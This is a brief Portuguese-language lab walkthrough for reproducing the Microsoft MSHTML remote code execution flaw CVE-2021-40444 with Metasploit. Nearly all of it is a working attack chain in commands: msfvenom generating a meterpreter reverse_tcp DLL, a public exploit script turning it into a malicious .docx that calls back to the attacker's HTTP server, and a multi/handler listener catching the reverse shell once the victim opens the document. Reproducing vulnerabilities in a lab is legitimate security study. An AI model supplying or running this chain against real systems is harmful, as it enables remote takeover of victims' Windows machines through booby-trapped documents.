
Uma tentativa de reproduzir a Vulnerabilidade de Execução Remota de Código (RCE) do Microsoft MSHTML e usando o Metasploit Framework.
Uma tentativa de reproduzir a Vulnerabilidade de Execução Remota de Código (RCE) do Microsoft MSHTML usando o Metasploit Framework.
funciona melhor se não executado em FlareVM
Faça um git clone do repositório em https://github.com/lockedbyte/CVE-2021-40444
Prepare o modelo .dll para ser usado posteriormente com o msfvenom
msfvenom -p windows/meterpreter/reverse_tcp lhost=<SOURCE_IP> lport=<LISTENING_PORT> -f dll -o template.dll
Copie o template.dll recém-produzido para a pasta test/ do repositório.
Dê permissão de execução ao template.dll com chmod +x template.dll
Execute o script para usar o template.dll e processá-lo em output
python3 exploit.py generate ~/test/template.dll http://<SOURCE IP>
O documento será então exportado para a pasta out/ e podemos criar um listener na nossa porta HTTP (Padrão é 80)
python3 exploit.py host 80
Execute o metasploit com
msfconsole -q
use multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost <SOURCE IP>
run
Então podemos enviar o document.docx para a nossa máquina vulnerável e executar o .docx
Receberemos resposta no terminal do exploit.py e o laboratório será bem-sucedido se conseguirmos gerar um shell reverso TCP.